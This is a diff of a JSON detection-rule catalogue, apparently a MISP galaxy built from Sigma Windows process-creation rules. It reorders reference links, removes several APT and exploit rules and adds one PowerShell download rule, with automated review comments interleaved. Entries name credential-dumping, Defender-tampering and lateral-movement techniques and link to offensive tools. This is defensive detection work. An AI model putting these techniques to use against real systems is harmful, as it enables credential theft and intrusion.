@@ -49972,8 +48852,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/mrd0x/status/1475085452784844803?s=12",
"https://twitter.com/an0n_r0/status/1474698356635193346?s=12",
+ "https://twitter.com/mrd0x/status/1475085452784844803?s=12",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_download_office_domain.yml"
],
"tags": "No established tags"
@@ -49995,9 +48875,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.poweradmin.com/paexec/",
- "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec",
"https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html",
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec",
+ "https://www.poweradmin.com/paexec/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml"
],
"tags": [
@@ -50017,39 +48897,6 @@
"uuid": "8834e2f7-6b4b-4f09-8906-d2276470ee23",
"value": "PsExec/PAExec Escalation to LOCAL SYSTEM"
},
- {
- "description": "Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/01/22",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_apt_unc2452_cmds.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_unc2452_cmds.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "9be34ad0-b6a7-4fbd-91cf-fc7ec1047f5f",
- "value": "UNC2452 Process Creation Patterns"
- },
{
"description": "Detects the usage of \"reg.exe\" to tamper with different Windows defender registry keys in order to disable some important features related to protection and detection",
"meta": {
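Review bot: the `related` entry here points at dest-uuid 970a3432-3237-47ad-bcca-7d8cbb217736, the same target used by the MERCURY and CVE-2020-1048 clusters that this patch also removes. If the attack-pattern galaxy mirrors these relations, three reverse links now point at uuids that no longer exist; the generator (or a follow-up commit) should prune the reverse references in the same change.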
@@ -50063,8 +48910,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/swagkarna/Defeat-Defender-V1.2.0",
"https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/",
+ "https://github.com/swagkarna/Defeat-Defender-V1.2.0",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_defender_tampering.yml"
],
"tags": [
@@ -50132,8 +48979,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.echotrail.io/insights/search/defaultpack.exe",
"https://lolbas-project.github.io/lolbas/OtherMSBinaries/DefaultPack/",
+ "https://www.echotrail.io/insights/search/defaultpack.exe",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_defaultpack.yml"
],
"tags": [
@@ -50167,10 +49014,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://web.archive.org/web/20220224045756/https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf",
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine",
- "https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution",
+ "https://web.archive.org/web/20220224045756/https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf",
"https://uvnc.com/docs/uvnc-viewer/52-ultravnc-viewer-commandline-parameters.html",
+ "https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ultravnc_susp_execution.yml"
],
"tags": [
@@ -50305,8 +49152,8 @@
"logsource.product": "windows",
"refs": [
"https://learn.microsoft.com/en-us/windows/win32/secauthz/mandatory-integrity-control",
- "https://cybercryptosec.medium.com/covid-19-cyber-infection-c615ead7c29",
"https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/",
+ "https://cybercryptosec.medium.com/covid-19-cyber-infection-c615ead7c29",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conhost_legacy_option.yml"
],
"tags": [
@@ -50397,7 +49244,7 @@
{
"description": "Detects suspicious and uncommon child processes of WmiPrvSE",
"meta": {
- "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng",
+ "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng, Florian Roth (Nextron Systems)",
"creation_date": "2021/08/23",
"falsepositive": [
"Unknown"
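Review bot: the `author` update (adding "Florian Roth (Nextron Systems)") together with the reference added in the next hunk reflects a genuine upstream edit, but `creation_date` stays 2021/08/23 and the cluster carries no modification date, so consumers cannot tell the rule changed. Consider carrying the upstream rule's modified date into `meta` so that content updates are visible without diffing the JSON.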
@@ -50409,6 +49256,7 @@
"refs": [
"https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/",
"https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/",
+ "https://twitter.com/ForensicITGuy/status/1334734244120309760",
"https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmiprvse_susp_child_processes.yml"
],
@@ -50446,40 +49294,6 @@
"uuid": "8a582fe2-0882-4b89-a82a-da6b2dc32937",
"value": "Suspicious WmiPrvSE Child Process"
},
- {
- "description": "Detects suspicious command line patterns seen being used by MERCURY APT",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2022/08/26",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_apt_mercury.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_mercury.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.001",
- "attack.g0069"
- ]
- },
- "related": [
- {
- "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "a62298a3-1fe0-422f-9a68-ffbcbc5a123d",
- "value": "MERCURY APT Activity"
- },
{
"description": "Detects processes that query known 3rd party registry keys that holds credentials via commandline",
"meta": {
@@ -50493,10 +49307,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry",
"https://github.com/HyperSine/how-does-MobaXterm-encrypt-password",
"https://isc.sans.edu/diary/More+Data+Exfiltration/25698",
"https://github.com/synacktiv/Radmin3-Password-Cracker/blob/acfc87393e4b7c06353973a14a6c7126a51f36ac/regkey.txt",
+ "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_enumeration_for_credentials_cli.yml"
],
"tags": [
@@ -50586,8 +49400,8 @@
"logsource.product": "windows",
"refs": [
"https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/",
- "https://twitter.com/jonasLyk/status/1555914501802921984",
"https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN",
+ "https://twitter.com/jonasLyk/status/1555914501802921984",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_use_image.yml"
],
"tags": [
@@ -50677,9 +49491,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md",
"https://eqllib.readthedocs.io/en/latest/analytics/210b4ea4-12fc-11e9-8d76-4d6bb837cda4.html",
"https://eqllib.readthedocs.io/en/latest/analytics/1e1ef6be-12fc-11e9-8d76-4d6bb837cda4.html",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lsass_dump.yml"
],
"tags": [
@@ -50932,11 +49746,11 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets",
- "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
"https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md",
+ "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
+ "https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_dumping_sensitive_hives.yml"
],
"tags": [
@@ -51021,8 +49835,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "Internal Research",
"https://tools.thehacker.recipes/mimikatz/modules",
+ "Internal Research",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml"
],
"tags": "No established tags"
@@ -51030,40 +49844,6 @@
"uuid": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09",
"value": "Suspicious SYSTEM User Process Creation"
},
- {
- "description": "Detects new commands that add new printer port which point to suspicious file",
- "meta": {
- "author": "EagleEye Team, Florian Roth",
- "creation_date": "2020/05/13",
- "falsepositive": [
- "New printer port install on host"
- ],
- "filename": "proc_creation_win_exploit_cve_2020_1048.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://windows-internals.com/printdemon-cve-2020-1048/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_1048.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.execution",
- "attack.t1059.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "cc08d590-8b90-413a-aff6-31d1a99678d7",
- "value": "Suspicious PrinterPorts Creation (CVE-2020-1048)"
- },
{
"description": "Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection",
"meta": {
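Review bot: the entry with uuid cc08d590-8b90-413a-aff6-31d1a99678d7 ("Suspicious PrinterPorts Creation (CVE-2020-1048)") is dropped outright and the commit gives no reason; its ref still points at rules/windows/process_creation/proc_creation_win_exploit_cve_2020_1048.yml, so if the upstream file was moved rather than retired the entry should be updated with the new path instead of deleted, and if it was retired, keeping the UUID with a deprecation marker on the entry avoids breaking MISP events that already carry this galaxy tag and the `related` link to dest-uuid 970a3432-3237-47ad-bcca-7d8cbb217736.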
@@ -51110,8 +49890,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration",
"https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/",
+ "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_diskshadow.yml"
],
"tags": [
@@ -51144,8 +49924,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/wdormann/status/1478011052130459653?s=20",
"https://twitter.com/0gtweet/status/1477925112561209344",
+ "https://twitter.com/wdormann/status/1478011052130459653?s=20",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_format.yml"
],
"tags": [
@@ -51168,8 +49948,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://web.archive.org/web/20200903194959/https://twitter.com/djmtshepana/status/1301608169496612866",
"https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/",
+ "https://web.archive.org/web/20200903194959/https://twitter.com/djmtshepana/status/1301608169496612866",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_mpcmdrun_download.yml"
],
"tags": [
@@ -51211,11 +49991,11 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/wmiexec.py",
"https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/dcomexec.py",
- "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/atexec.py",
"https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/smbexec.py",
"https://www.elastic.co/guide/en/security/current/suspicious-cmd-execution-via-wmi.html",
+ "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/atexec.py",
+ "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/wmiexec.py",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_impacket_lateral_movement.yml"
],
"tags": [
@@ -51257,9 +50037,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://lolbas-project.github.io/lolbas/Binaries/Regini/",
"https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini",
- "https://lolbas-project.github.io/lolbas/Binaries/Regini/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini_execution.yml"
],
"tags": [
@@ -51325,10 +50105,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://isc.sans.edu/diary/22264",
"https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/",
- "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
+ "https://isc.sans.edu/diary/22264",
"https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/",
+ "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml"
],
"tags": [
@@ -51404,9 +50184,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://www.virustotal.com/gui/file/02e8e8c5d430d8b768980f517b62d7792d690982b9ba0f7e04163cbc1a6e7915",
"https://github.com/electron/rcedit",
"https://security.stackexchange.com/questions/210843/is-it-possible-to-change-original-filename-of-an-exe",
- "https://www.virustotal.com/gui/file/02e8e8c5d430d8b768980f517b62d7792d690982b9ba0f7e04163cbc1a6e7915",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_rcedit_execution.yml"
],
"tags": [
@@ -51464,9 +50244,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.virustotal.com/gui/search/content%253A%2522Set-MpPreference%2520-Disable%2522/files",
- "https://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE",
"https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps",
+ "https://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE",
+ "https://www.virustotal.com/gui/search/content%253A%2522Set-MpPreference%2520-Disable%2522/files",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_disable_feature.yml"
],
"tags": [
@@ -51534,8 +50314,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments",
"https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11)",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntdsutil_susp_usage.yml"
],
"tags": [
@@ -51555,40 +50335,6 @@
"uuid": "a58353df-af43-4753-bad0-cd83ef35eef5",
"value": "Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)"
},
- {
- "description": "Detects execution of known compromised version of 3CXDesktopApp",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2023/03/29",
- "falsepositive": [
- "Legitimate usage of 3CXDesktopApp"
- ],
- "filename": "proc_creation_win_malware_3cx_compromise_execution.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_3cx_compromise_execution.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1218",
- "attack.execution"
- ]
- },
- "related": [
- {
- "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "93bbde78-dc86-4e73-9ffc-ff8a384ca89c",
- "value": "Potential Compromised 3CXDesktopApp Execution"
- },
{
"description": "Detects usage of cmdkey to look for cached credentials on the system",
"meta": {
@@ -51687,10 +50433,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://isc.sans.edu/diary/22264",
"https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/",
- "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
+ "https://isc.sans.edu/diary/22264",
"https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/",
+ "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml"
],
"tags": [
@@ -51830,38 +50576,37 @@
"value": "Suspicious File Download via CertOC.exe"
},
{
- "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group",
+ "description": "Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access",
"meta": {
- "author": "Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)",
- "creation_date": "2019/03/04",
+ "author": "Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2023/04/21",
"falsepositive": [
"Unknown"
],
- "filename": "proc_creation_win_apt_slingshot.yml",
+ "filename": "proc_creation_win_powershell_invoke_webrequest_direct_ip.yml",
"level": "medium",
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://securelist.com/apt-slingshot/84312/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_slingshot.yml"
+ "https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_invoke_webrequest_direct_ip.yml"
],
"tags": [
- "attack.persistence",
- "attack.t1053.005",
- "attack.s0111"
+ "attack.command_and_control",
+ "attack.t1105"
]
},
"related": [
{
- "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "related-to"
}
],
- "uuid": "958d81aa-8566-4cea-a565-59ccd4df27b0",
- "value": "Defrag Deactivation"
+ "uuid": "1edff897-9146-48d2-9066-52e8d8f80a2f",
+ "value": "Suspicious Invoke-WebRequest Execution With DirectIP"
},
{
"description": "Detects the execution of netsh with \"add helper\" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.",
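Review bot: git has rendered this hunk as an in-place edit, but it is really the removal of "Defrag Deactivation" (uuid 958d81aa-8566-4cea-a565-59ccd4df27b0, proc_creation_win_apt_slingshot.yml) plus the insertion of an unrelated new rule (uuid 1edff897-9146-48d2-9066-52e8d8f80a2f, proc_creation_win_powershell_invoke_webrequest_direct_ip.yml) at the same position; review the Slingshot removal on the same terms as the other dropped entries in this patch rather than as a field-level change, and confirm the retained context lines (`"falsepositive": ["Unknown"]`, `"level": "medium"`) are what the new upstream rule actually declares and not leftovers of the old entry that happened to match.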
@@ -51876,8 +50621,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.007/T1546.007.md",
"https://attack.mitre.org/software/S0108/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.007/T1546.007.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml"
],
"tags": [
@@ -51912,8 +50657,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://isc.sans.edu/diary/22264",
"https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/",
+ "https://isc.sans.edu/diary/22264",
"https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_extensions.yml"
],
@@ -51990,8 +50735,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://web.archive.org/web/20200329173843/https://p16.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation",
"https://www.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation/?edition=2019",
+ "https://web.archive.org/web/20200329173843/https://p16.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_setspn_spn_enumeration.yml"
],
"tags": [
@@ -52148,10 +50893,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab",
+ "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd",
"https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0",
"https://twitter.com/nas_bench/status/1537896324837781506",
- "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd",
+ "https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_susp_cab_options.yml"
],
"tags": [
@@ -52171,62 +50916,6 @@
"uuid": "dc4576d4-7467-424f-9eee-fd2b02855fe0",
"value": "Suspicious Cabinet File Execution Via Msdt.EXE"
},
- {
- "description": "Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)",
- "meta": {
- "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali",
- "creation_date": "2023/01/21",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_exploit_other_win_server_undocumented_rce.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/hackerfantastic/status/1616455335203438592?s=20",
- "https://twitter.com/YanZiShuang/status/1616777483646533632?s=20&t=TQT9tUuPbQJai4v6HtsOQw",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_other_win_server_undocumented_rce.yml"
- ],
- "tags": "No established tags"
- },
- "uuid": "6d5b8176-d87d-4402-8af4-53aee9db7b5d",
- "value": "Potential Exploitation Attempt Of Undocumented WindowsServer RCE"
- },
- {
- "description": "Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2022/02/25",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_malware_hermetic_wiper_activity.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_hermetic_wiper_activity.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.lateral_movement",
- "attack.t1021.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "eb062747-2193-45de-8fa2-e62549c37ddf",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "2f974656-6d83-4059-bbdf-68ac5403422f",
- "value": "Hermetic Wiper TG Process Patterns"
- },
{
"description": "Detects command line parameters used by Hydra password guessing hack tool",
"meta": {
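Review bot: taken together with the other removals in this patch, the dropped filenames all follow the proc_creation_win_exploit_*, proc_creation_win_malware_* and proc_creation_win_apt_* patterns while the generic proc_creation_win_* rules around them are kept, which looks like a whole category of upstream rules being excluded by the generator rather than individual retirements; the commit message should state the inclusion filter now applied so consumers can predict which cluster entries (and which `related` ATT&CK edges, e.g. dest-uuid eb062747-2193-45de-8fa2-e62549c37ddf here) disappear, and the change log for the cluster should list the removed UUIDs.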
@@ -52343,8 +51032,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/outflanknl/Dumpert",
"https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/",
+ "https://github.com/outflanknl/Dumpert",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_dumpert.yml"
],
"tags": [
@@ -52377,10 +51066,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/",
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/",
"https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7",
+ "https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml"
],
"tags": [
@@ -52516,49 +51205,6 @@
"uuid": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b",
"value": "Security Privileges Enumeration Via Whoami.EXE"
},
- {
- "description": "Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2019/02/21",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_apt_apt31_judgement_panda.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_apt31_judgement_panda.yml"
- ],
- "tags": [
- "attack.lateral_movement",
- "attack.credential_access",
- "attack.g0128",
- "attack.t1003.001",
- "attack.t1560.001"
- ]
- },
